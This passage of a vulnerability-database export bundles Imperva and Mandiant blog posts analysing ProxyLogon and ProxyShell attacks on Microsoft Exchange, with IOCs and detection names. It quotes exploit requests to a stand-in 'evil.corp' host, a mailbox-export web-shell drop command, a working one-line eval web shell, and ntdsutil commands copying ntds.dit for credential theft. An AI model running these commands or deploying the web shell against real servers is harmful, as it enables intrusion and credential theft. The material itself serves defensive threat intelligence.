private email, or even achieve remote code execution.\n\nImperva has put dedicated security rules in place to protect our customers in a direct response to the initial disclosures. 
Imperva has also performed analysis on the attempted exploitation of these CVEs and we have produced the following insights.\n\n### Observations and Statistics\n\nSince the 2 March disclosures, Imperva has observed over **44k** scanning and exploitation attempt sessions in the wild from over **1,600** unique source IPs, related to the Microsoft Exchange [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) SSRF. From this data, we have been able to identify the most targeted industries and countries which have been affected by the vulnerability in the aftermath of the disclosures.\n\n### Targeted Industries\n\nOne of the key observations we have made is that this vulnerability has impacted almost every category of industry, this observation is explained by how ubiquitous the use of Microsoft Exchange is across all sectors. According to our data, the Computing & IT sector was the most targeted industry, with 21% of all targeted sites belonging to this category. Next was Financial Services with 18%, and Telecoms and ISPs completed the top 3 with 10.5%. Below we show the breakdown of scanning and exploitation attempts against various industries.\n\n### Targeted Countries\n\nImperva observed both scanning and exploitation attempts against sites worldwide, with the US being the most targeted country, with the UK and Singapore a distant second and third, respectively.\n\n### Source Countries\n\nImperva observed that since the disclosures, relatively few scanning and exploitation attempts have been made from Chinese sources. This could be because exploitation, and to a greater extent, scanning has shifted to the wider public. It may also be because the attackers are using proxies to carry out the attacks. 
The chart below shows the top attacking countries by session count observed by Imperva analysts since the disclosures.\n\n### Attacker IP Reputation\n\nImperva\u2019s IP reputation allows for the identification of potentially suspicious or malicious behaviour by means of tagging relevant IPs. From this data, **42.3%** of the attacker source IPs were previously tagged by Imperva as having exhibited malicious behaviour and **8.45%** of the attacker source IPs were previously tagged by Imperva as being identified as vulnerability scanners.\n\n### Observed Attacker Activity\n\nImperva analysts have observed various indicators of the attempted exploitation of the Microsoft Exchange Hafnium [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) in the wild, indicating various motives on the part of the attackers. As mentioned previously, an attacker can leverage the vulnerability to perform various unauthorized actions, including the collection of private information, and even the writing of arbitrary files to the server resulting in remote code execution. 
In this section, we will discuss some of the requests we have observed and the perceived intentions and motivation of the attackers.\n\nDetailed descriptions of how the exploit chain works, and how it can be exploited, are available at various sources [[1](<https://testbnull.medium.com/ph%C3%A2n-t%C3%ADch-l%E1%BB%97-h%E1%BB%95ng-proxylogon-mail-exchange-rce-s%E1%BB%B1-k%E1%BA%BFt-h%E1%BB%A3p-ho%C3%A0n-h%E1%BA%A3o-cve-2021-26855-37f4b6e06265>)][[2](<https://www.praetorian.com/blog/reproducing-proxylogon-exploit/>)]; however, the important thing to understand is that the vulnerability allows an attacker to send malicious requests to various backend components in Microsoft Exchange by means of a specially crafted POST request to either the Outlook Web Application or the Exchange Admin Centre, where the \u201cX-BEResource\u201d and \u201cX-AnonResource-Backend\u201d cookie values can be manipulated to specify the targeted resource. In our investigation following the disclosures, we have observed the following in our data.\n\n### Crafted requests to /EWS/Exchange.asmx\n\nA common exploit request observed by Imperva attempting to exploit the CVE-2021-26855 SSRF vulnerability was a POST request to the Exchange Admin Centre (/ecp/) and Outlook Web Application (/owa/) endpoints, with the crafted cookie value set to the Exchange Web Services endpoint \u201c/EWS/Exchange.asmx\u201d. This allows the attacker to gain authenticated access to private mail on the server. 
This request accounted for **18%** of exploitation attempts observed.\n\n### Crafted requests to /autodiscover/autodiscover.xml\n\nThe most common exploitation attempt of the SSRF observed by Imperva analysts was requests to the Exchange Admin Centre endpoint (/ecp), with the vulnerable cookie set with the FQDN of the server, and the endpoint of /autodiscover/autodiscover.xml.\n\nAutodiscover in Exchange is a service which allows for the rapid collection of Exchange configurations, service URLs and supported protocols; therefore, it makes an obvious target for attackers who are attempting to quickly gather information, escalate privileges and maintain persistence. In the case of this vulnerability, the autodiscover service could be used to gather the information required for further exploitation of the other CVEs associated with the chain. This request accounted for **51%** of exploitation attempts observed.\n\n### Crafted requests to /mapi/emsmdb\n\nAnother pattern Imperva analysts observed was crafted POST requests to the Exchange Admin Centre (/ecp), with the cookie value crafted with the **/mapi/emsmdb** endpoint.\n\nResearch into the published exploits and disclosures indicates that the \u201c/mapi/emsmdb\u201d endpoint can be abused to procure a valid SID, which can then allow the attacker to gain privileges to the Exchange \u201c**proxyLogin.ecp**\u201d endpoint (Exchange HTTP proxy), which can in turn be used to obtain valid \u201c**ASP.NET_SessionID**\u201d and \u201c**msExchEcpCanary**\u201d values which are required for further chained exploitation of MS Exchange. This request accounted for **3%** of exploitation attempts observed.\n\n### How Imperva protects you\n\nImperva has implemented rules in [Cloud WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) and [On Prem WAF](<https://www.imperva.com/products/web-application-firewall-waf/>), which are effective against all exploitation of CVE-2021-26855. 
These rules are also effective against the chained exploitation of the subsequent CVEs: [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>) and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>).\n\n### Check if you have been compromised\n\nSince the disclosures of these zero day vulnerabilities, various news articles have been published reporting mass exploitation [[1](<https://www.bbc.com/news/technology-56372188>)][[2](<https://www.zdnet.com/article/microsoft-exchange-server-zero-day-attacks-malicious-software-found-on-2300-machines-in-uk/>)]. We recommend that if you have unpatched exchange servers in your organization, you apply the latest patches from Microsoft as soon as possible, and use the following [guide](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>) from Microsoft to check for any indicators of compromise.\n\nThe post [Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures](<https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-26T15:06:38", "type": "impervablog", "title": "Imperva Observes Hive of Activity Following Hafnium Microsoft Exchange Disclosures", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-26T15:06:38", "id": "IMPERVABLOG:7B28F00C5CD12AC5314EB23EAE40413B", "href": "https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-11T12:35:13", "description": "Beginning in January 2021, Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment. The observed activity included creation of web shells for persistent access, remote code execution, and reconnaissance for endpoint security solutions. Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM, a privileged local account on the Windows operating system. Furthermore, the process that created the web shell was UMWorkerProcess.exe, the process responsible for Exchange Server\u2019s Unified Messaging Service. In subsequent investigations, we observed malicious files created by w3wp.exe, the process responsible for the Exchange Server web front-end.\n\nIn response to this activity, we built threat hunting campaigns designed to identify additional Exchange Server abuse. We also utilized this data to build higher-fidelity detections of web server process chains. 
On March 2, 2021, Microsoft released a [blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) that detailed multiple zero-day vulnerabilities used to attack on-premises versions of Microsoft Exchange Server. Microsoft also issued emergency Exchange Server updates for the following vulnerabilities:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \n**CVE-2021-26855**\n\n| \n\nCritical\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004941>) \n \n**CVE-2021-26857**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004938>) \n \n**CVE-2021-26858**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004944>) \n \n**CVE-2021-27065**\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://intelligence.fireeye.com/reports/21-00004939>) \n \nTable 1: List of March 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\nThe activity reported by Microsoft aligns with our observations. **FireEye currently tracks this activity in three clusters, UNC2639, UNC2640, and UNC2643. We anticipate additional clusters as we respond to intrusions.** We recommend following Microsoft\u2019s guidance and patching Exchange Server immediately to mitigate this activity.\n\nBased on our telemetry, we have identified an array of affected victims including US-based retailers, local governments, a university, and an engineering firm. Related activity may also include a Southeast Asian government and Central Asian telecom. 
[Microsoft reported](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) the exploitation occurred together and is linked to a single group of actors tracked as \u201cHAFNIUM\u201d, a group that has previously targeted the US-based defense companies, law firms, infectious disease researchers, and think tanks.\n\nIn this blog post, we will detail our observations on the active investigations we are currently performing. As our experience with and knowledge of this threat actor grows, we will update this post or release new technical details as appropriate. For our Managed Defense Customers, we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity.\n\nWe will be discussing these attacks more in an [upcoming webinar on Mar. 17, 2021](<https://www.brighttalk.com/webcast/7451/475010?utm_source=FireEye&utm_medium=brighttalk&utm_campaign=475010>).\n\n#### From Exploit to Web Shell\n\nBeginning in January 2021, Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer\u2019s environment. The web shell, named help.aspx (MD5: 4b3039cf227c611c45d2242d1228a121), contained code to identify the presence of (1) FireEye xAgent, (2) CarbonBlack, or (3) CrowdStrike Falcon endpoint products and write the output of discovery. Figure 1 provides a snippet of the web shell\u2019s code.\n\n\n\n \nFigure 1: Snippet of the web shell help.aspx, crafted to identify the presence of endpoint security software on a victim system\n\nThe web shell was written to the system by the UMWorkerProcess.exe process, which is associated with Microsoft Exchange Server\u2019s Unified Messaging service. This activity suggested exploitation of CVE-2021-26858.\n\nApproximately twenty days later, the attacker placed another web shell on a separate Microsoft Exchange Server. 
This second, partially obfuscated web shell, named iisstart.aspx (MD5: 0fd9bffa49c76ee12e51e3b8ae0609ac), was more advanced and contained functions to interact with the file system. As seen in Figure 2, the web shell included the ability to run arbitrary commands and upload, delete, and view the contents of files.\n\n\n\n \nFigure 2: Snippet of iisstart.aspx, uploaded by the attacker in late January 2021\n\nWhile the use of web shells is common amongst threat actors, the parent processes, timing, and victim(s) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange.\n\nIn March 2021, in a separate environment, we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server. This was likely to establish both persistence and secondary access, as in other environments. In this case, Mandiant observed the process w3wp.exe, (the IIS process associated with the Exchange web front-end) spawning cmd.exe to write a file to disk. The file, depicted in Figure 3, matches signatures for the tried-and-true [China Chopper](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>).\n\n\n\n \nFigure 3: Snippet of China Chopper web shell found on a compromised Exchange Server system\n\nWe observed that in at least two cases, the threat actors subsequently issued the following command against the Exchange web server:\n\nnet group \"Exchange Organization administrators\" administrator /del /domain.\n\nThis command attempts to delete the administrator user from the Exchange Organizations administrators group, beginning with the Domain Controller in the current domain. 
If the system is in a single-system domain, it will execute on the local computer.\n\nPer Microsoft\u2019s blog, Microsoft has identified additional post-exploitation activities, including:\n\n * Credential theft via dumping of LSASS process memory.\n * Compression of data for exfiltration via 7-Zip.\n * Use of Exchange PowerShell Snap-ins to export mailbox data.\n * Use of additional offensive security tools [Covenant](<https://github.com/cobbr/Covenant>), [Nishang](<https://github.com/samratashok/nishang>), and [PowerCat](<https://github.com/besimorhino/powercat>) for remote access.\n\nThe activity we have observed, coupled with observations from others in the information security industry, indicates that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments. This activity is followed quickly by additional access and persistence mechanisms. As previously stated, we have multiple ongoing cases and will continue to provide insight as we respond to intrusions.\n\n#### Investigation Tips\n\nWe recommend checking the following for potential evidence of compromise:\n\n * Child processes of C:\\Windows\\System32\\inetsrv\\w3wp.exe on Exchange Servers, particularly cmd.exe.\n * Files written to the system by w3wp.exe or UMWorkerProcess.exe.\n * ASPX files owned by the SYSTEM user\n * New, unexpected compiled ASPX files in the Temporary ASP.NET Files directory\n * Reconnaissance, vulnerability-testing requests to the following resources from an external IP address: \n * /rpc/ directory\n * /ecp/DDI/DDIService.svc/SetObject\n * Non-existent resources\n * With suspicious or spoofed HTTP User-Agents\n * Unexpected or suspicious Exchange PowerShell SnapIn requests to export mailboxes\n\nIn our investigations to date, the web shells placed on Exchange Servers have been named differently in each intrusion, and thus the file name alone is not a high-fidelity indicator of compromise.\n\nIf you believe your Exchange Server was compromised, we recommend 
investigating to determine the scope of the attack and dwell time of the threat actor.\n\nFurthermore, as system and web server logs may have time or size limits enforced, we recommend preserving the following artifacts for forensic analysis:\n\n * At least 14 days of HTTP web logs from the inetpub\\Logs\\LogFiles directories (include logs from all subdirectories)\n * The contents of the Exchange Web Server (also found within the inetpub folder)\n * At least 14 days of Exchange Control Panel (ECP) logs, located in Program Files\\Microsoft\\Exchange Server\\v15\\Logging\\ECP\\Server\n * Microsoft Windows event logs\n\nWe have found significant hunting and analysis value in these log folders, especially for suspicious CMD parameters in the ECP Server logs. We will continue updating technical details as we observe more related activity.\n\n#### Technical Indicators\n\nThe following are technical indicators we have observed, organized by the threat groups we currently associate with this activity. To increase investigation transparency, we are including a Last Known True, or LKT, value for network indicators. 
The LKT timestamp indicates the last time Mandiant knew the indicator was associated with the adversary; however, as with all ongoing intrusions, a reasonable time window should be considered.\n\n##### UNC2639\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**Note** \n \n---|---|--- \n \n165.232.154.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/02 02:43 \n \n182.18.152.105\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 16:16 \n \n##### UNC2640\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5** \n \n---|---|--- \n \nhelp.aspx\n\n| \n\nFile: Web shell\n\n| \n\n4b3039cf227c611c45d2242d1228a121 \n \niisstart.aspx\n\n| \n\nFile: Web shell\n\n| \n\n0fd9bffa49c76ee12e51e3b8ae0609ac \n \n##### UNC2643\n\n**Indicator**\n\n| \n\n**Type**\n\n| \n\n**MD5/Note** \n \n---|---|--- \n \nCobalt Strike BEACON\n\n| \n\nFile: Shellcode\n\n| \n\n79eb217578bed4c250803bd573b10151 \n \n89.34.111.11\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:06 \n \n86.105.18.116\n\n| \n\nNetwork: IP Address\n\n| \n\nLast known true: 2021/03/03 21:39 \n \n#### Detecting the Techniques\n\nFireEye detects this activity across our platforms. 
The following contains specific detection names that provide an indicator of Exchange Server exploitation or post-exploitation activities we associated with these threat actors.\n\n**_Platform_(s)**\n\n| \n\n**_Detection Name_** \n \n---|--- \n \n * Network Security \n * Email Security \n * Detection On Demand \n * Malware File Scanning \n * Malware File Storage Scanning \n| \n\n * FEC_Trojan_ASPX_Generic_2\n * FE_Webshell_ASPX_Generic_33\n * FEC_APT_Webshell_ASPX_HEARTSHELL_1\n * Exploit.CVE-2021-26855 \n \nEndpoint Security\n\n| \n\n**_Real-Time (IOC)_**\n\n * SUSPICIOUS CODE EXECUTION FROM EXCHANGE SERVER (EXPLOIT)\n * ASPXSPY WEBSHELL CREATION A (BACKDOOR)\n * PROCDUMP ON LSASS.EXE (METHODOLOGY)\n * TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\n * NISHANG POWERSHELL TCP ONE LINER (BACKDOOR)\n * SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)\n * POWERSHELL DOWNLOADER (METHODOLOGY)\n\n**_Malware Protection (AV/MG)_**\n\n * Trojan.Agent.Hafnium.A\n\n**_Module Coverage_**\n\n * [Process Guard] - prevents dumping of LSASS memory using the procdump utility. 
\n \nHelix\n\n| \n\n * WINDOWS METHODOLOGY [Unusual Web Server Child Process]\n * MICROSOFT EXCHANGE [Authentication Bypass (CVE-2021-26855)]\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-04T00:00:00", "type": "fireeye", "title": "Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T00:00:00", "id": "FIREEYE:C650A7016EEAD895903FB350719E53E3", "href": "https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-07T14:46:37", "description": "In August 2021, Mandiant Managed Defense identified and responded to the exploitation of a chain of vulnerabilities known as ProxyShell.** **The ProxyShell vulnerabilities consist of three CVEs (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting the following versions of on-premises Microsoft Exchange 
Servers.\n\n * Exchange Server 2013 (Cumulative Update 23 and below)\n * Exchange Server 2016 (Cumulative Update 20 and below)\n * Exchange Server 2019 (Cumulative Update 9 and below)\n\nThe vulnerabilities are being tracked in the following CVEs:\n\n**CVE**\n\n| \n\n**Risk Rating**\n\n| \n\n**Access Vector**\n\n| \n\n**Exploitability**\n\n| \n\n**Ease of Attack**\n\n| \n\n**Mandiant Intel** \n \n---|---|---|---|---|--- \n \nCVE-2021-34473\n\n| \n\nHigh\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--8e100992-6111-54ed-96b4-f817cf47edd0>) \n \nCVE-2021-34523\n\n| \n\nLow\n\n| \n\nLocal\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--f8db969d-dddf-5b2e-81ce-439289be6cde>) \n \nCVE-2021-31207\n\n| \n\nMedium\n\n| \n\nNetwork\n\n| \n\nFunctional\n\n| \n\nEasy\n\n| \n\n[Link](<https://advantage.mandiant.com/cve/vulnerability--5c5c0f7e-96a8-5403-8487-373322342c46>) \n \nTable 1: List of May & July 2021 Microsoft Exchange CVEs and FireEye Intel Summaries\n\n#### Overview\n\nMicrosoft Exchange Server provides email and supporting services for organizations. This solution is used globally, both on-premises and in the cloud. This chain of vulnerabilities exists in unpatched on-premises editions of Microsoft Exchange Server only and is being actively exploited on those servers accessible on the Internet.\n\nMandiant responded to multiple intrusions impacting a wide variety of industries including Education, Government, Business services, and Telecommunications. These organizations are based in the United States, Europe, and Middle East. 
However, targeting is almost certainly broader than directly observed.\n\nOne specific targeted attack observed by Mandiant, detailed in this post, was against a US-based university where UNC2980 exploited ProxyShell vulnerabilities to gain access to the environment.\n\n#### The Exploit Chain Explained\n\nProxyShell refers to a chain of attacks that exploit three different vulnerabilities affecting on-premises Microsoft Exchange servers to achieve pre-authenticated remote code execution (RCE). The exploitation chain was discovered and [published](<https://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell>) by Orange Tsai (@orange_8361) from the DEVCORE Research Team.\n\n##### Delivering the Payload\n\nIn order to later create a web shell on a Microsoft Exchange server by exporting from a mailbox, an attacker first needs to create an email item within a mailbox. In the Metasploit implementation of the attack, the Autodiscover service is abused to leak a known user\u2019s distinguished name (DN), which is an address format used internally within Microsoft Exchange. The Messaging Application Programming Interface (MAPI) is then leveraged to leak the user's security identifier (SID), by passing the previously leaked DN as a request. The SID is then used to forge an access token to communicate with Exchange Web Services (EWS).\n\nWith the attacker able to successfully impersonate the target user with a valid access token, they can perform EWS operations. To continue with the ProxyShell attack, the operation \u2018CreateItem\u2019 is used, which allows the remote creation of email messages in the impersonated user\u2019s mailbox. 
While responding, Mandiant has seen draft emails with attached web shells, encoded in such a way that they become decoded upon export to PST later in the attack (specifically with permutative encoding).\n\nEmails may also be placed in targeted users' mailboxes via SMTP, as was suggested in Orange Tsai\u2019s documentation of the attack.\n\n##### CVE-2021-34473 \u2014 Pre-auth Path Confusion Leads to ACL Bypass\n\nMicrosoft Exchange has a feature called \u2018Explicit Logon\u2019, which legitimately allows users to open another user's mailbox or calendar in a new browser window by providing the mailbox address in the URL. The feature was designed to only provide access where \u2018Full Access\u2019 is granted to the user, and the target mailbox or calendar is configured to publish. Exchange is designed to normalize the specified mailbox address in the URL to identify the target.\n\nThe vulnerability exists in passing the string Autodiscover/Autodiscover.json to the email field in the URL. 
By passing that string, Exchange does not perform sufficient checks on the address, and through its normalization process, this leads to arbitrary access to backend URLs as NT AUTHORITY/SYSTEM.\n\nGET /autodiscover/autodiscover.json?@evil.corp/?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nGET /autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp\n\nPOST /autodiscover/autodiscover.json?@evil.corp/mapi/emsmdb?&Email=autodiscover/autodiscover.json%3F@evil.corp \n \n--- \n \nFigure 1: Requests showing how an attacker can abuse the normalization process of the Explicit Logon feature\n\n##### CVE-2021-34523 \u2014 Elevation of Privilege on Exchange PowerShell Backend\n\nThe Exchange PowerShell Remoting feature, natively built into Microsoft Exchange, was designed to assist with administrative activities via the command line. The previous exploit allowed an attacker to interface with arbitrary backend URLs as NT AUTHORITY/SYSTEM, however since that user does not have a mailbox, the attacker cannot directly interface with the PowerShell backend (/Powershell) at that privilege level.\n\nThe PowerShell backend checks for the X-CommonAccessToken header in incoming requests. If the header does not exist, another method is used to get a CommonAccessToken. This method checks for the X-Rps-CAT parameter in the incoming request, and if present, deserializes this to a valid CommonAccessToken. With the previously collected information on the target mailbox or default information from built-in mailboxes, passing of a valid X-Rps-CAT value is trivial.\n\nBy passing this value to the PowerShell backend with the previously successful access token, an attacker can downgrade from the NT AUTHORITY/SYSTEM account to the target user. 
This user must have local administrative privileges in order to execute arbitrary Exchange PowerShell commands.\n\nPOST /autodiscover/autodiscover.json?a=abcde@evil.com/powershell/?X-Rps-CAT=[Base64 encoded data] \n \n--- \n \nFigure 2: This request uses the parameter X-Rps-CAT, which allows valid user impersonation\n\n##### CVE-2021-31207 \u2014 Post-auth Arbitrary-File-Write Leads to RCE\n\nOnce the two previous vulnerabilities are exploited successfully, the vulnerability CVE-2021-31207 allows the attacker to write files. As soon as the attacker is able to execute arbitrary PowerShell commands, and the required \u2018Import Export Mailbox\u2019 role is assigned to the impersonated user (which can be achieved by execution of the New-ManagementRoleAssignment cmdlet), the cmdlet New-MailboxExportRequest can be used to export a user\u2019s mailbox to a specific desired path e.g.\n\nNew-MailBoxExportRequest \u2013 Mailbox john.doe@enterprise.corp -FilePath \\\\\\127.0.0.1\\C$\\path\\to\\webshell.aspx \n \n--- \n \nFigure 3: New-MailBoxExportRequest can be used to export payloads\n\nThe use of New-MailboxExportRequest allows the attacker to export target mailboxes where previously created emails with encoded web shells were created. The attacker can export the mailbox to a PST file format with a web file extension, such as ASPX, which allows the attacker to drop a functional web shell, since the encoded attachments in the email are decoded upon write to the PST file format. This is due to the PST file format using permutative encoding, by attaching a pre-encoded payload, upon export the decoded payload is actually written.\n\n#### Observations From Investigations\n\nMandiant responded to intrusions involving ProxyShell exploitation across a range of customers and industries. 
Examples of proof-of-concept (PoC) exploits developed and released publicly by security researchers could be leveraged by any threat group, leading to adoption by threat groups with varying levels of sophistication. Mandiant has observed the exploit chain resulting in post-exploitation activities, including the deployment of web shells, backdoors, and tunneling utilities to further compromise victim organizations. As of the release of this blog post, Mandiant tracks eight [UNC groups](<https://www.fireeye.com/blog/products-and-services/2020/12/how-mandiant-tracks-uncategorized-threat-actors.html>) exploiting the ProxyShell vulnerabilities. Mandiant anticipates more clusters will be formed as different threat actors adopt working exploits.\n\n##### Exploitation\n\nMandiant has observed the exploitation of ProxyShell starting with the abuse of Autodiscover services to leak a known user\u2019s distinguished name (DN), which is then leveraged to leak the administrator security identifier (SID).\n\nBy using the leaked DN and SID, the attacker can create a mailbox that contains a draft email with a malicious payload as an attachment. Afterwards, the mailbox and the contained payload are exported to a web-accessible directory or another directory on the host.\n\nAttempted exploitation of ProxyShell appears to be mostly automated. In some cases, Mandiant observed only partial attacker success, such as the creation of items in mailboxes remotely, but not the exporting of mailboxes and their contained payloads to another directory on the host.\n\nMandiant has observed a wide range of source IP addresses and user agents attempting HTTP requests consistent with the first stage of the ProxyShell exploit chain.\n\n##### Post-Exploitation\n\nUpon successful exploitation of the vulnerabilities, Mandiant observed multiple payloads to gain a foothold in the network including CHINACHOP and BLUEBEAM web shells (see Malware Definitions section). 
Follow-on actions include execution of internal reconnaissance commands on servers, and deployment of tunneler utilities.\n\nFigure 4: BLUEBEAM ASP web shell that was embedded into a PST payload\n\n#### Threat Actor Spotlight: UNC2980\n\nIn August 2021, Mandiant Managed Defense responded to an intrusion leveraging the ProxyShell vulnerability at a US-based university. Mandiant tracks this threat actor as UNC2980.\n\nUNC2980 is a cluster of threat activity tracked since August 2021 and believed to be conducting cyber espionage operations. Mandiant suspects, currently at low confidence, that this group is operating from China. UNC2980 has been observed exploiting CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, publicly referred to as \"ProxyShell\", to upload web shells for initial access. The group relies on multiple publicly available tools including EARTHWORM, HTRAN, MIMIKATZ, and WMIEXEC post-compromise.\n\n#### UNC2980 in Action\n\nUpon gaining access through the exploitation of ProxyShell and deploying a web shell, UNC2980 dropped multiple tools into the victim environment. The following publicly available tools were observed on the initial compromised host: HTRAN, EARTHWORM, and several MIMIKATZ variants.\n\n<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script> \n \n--- \n \nFigure 5: Web shell embedded in PST payload used by UNC2980\n\nApproximately 11 hours and 44 minutes after the ProxyShell exploitation, Mandiant observed post-exploitation activity beginning with multiple Event ID 4648 (A logon was attempted using explicit credentials) events initiated by the process C:\\root\\mimikatz.exe on the initial compromised host. All Event ID 4648 events were associated with two different domain controllers within the environment.\n\nThe group then utilized the utility WMIEXEC to conduct post-exploitation activity. 
This was primarily observed through the default redirection of command output used by WMIEXEC.\n\ncmd.exe /c whoami > C:\\wmi.dll 2>&1\n\ncmd.exe /c quser > C:\\wmi.dll 2>&1\n\ncmd.exe /c net localgroup administrators > C:\\wmi.dll 2>&1 \n \n--- \n \nFigure 6: Reconnaissance commands executed via WMICEXEC\n\nUNC2980 was observed utilizing several techniques for credential theft once access to a host was established. In one instance, after performing reconnaissance, UNC2980 deployed multiple variants of MIMIKATZ. In another instance, UNC2980 utilized multiple batch files which executed ntdsutil to enumerate snapshots of volumes and were then used to copy ntds.dit and the System hive.\n\nntdsutil snapshot \"List All\" quit quit >>c:\\temp\\1.txt\n\nntdsutil snapshot \"unmount {[GUID]}\" quit quit\n\nnet localgroup administrators\n\nntdsutil snapshot \"activate instance ntds\" create quit quit\n\nntdsutil snapshot \"delete {[GUID] }\" quit quit\n\nntdsutil snapshot \"mount {[GUID]}\" quit quit\n\ncopy c:\\$SNAP_[date]_VOLUMEC$\\windows\\ntds\\ntds.dit c:\\temp\\ntds.dit\n\nreg save hklm\\system c:\\temp\\s.hive \n \n--- \n \nFigure 7: Executed Batch commands\n\n#### Monitoring and Investigating\n\nMandiant recommends monitoring or investigating for compromise on presently or previously vulnerable Exchange 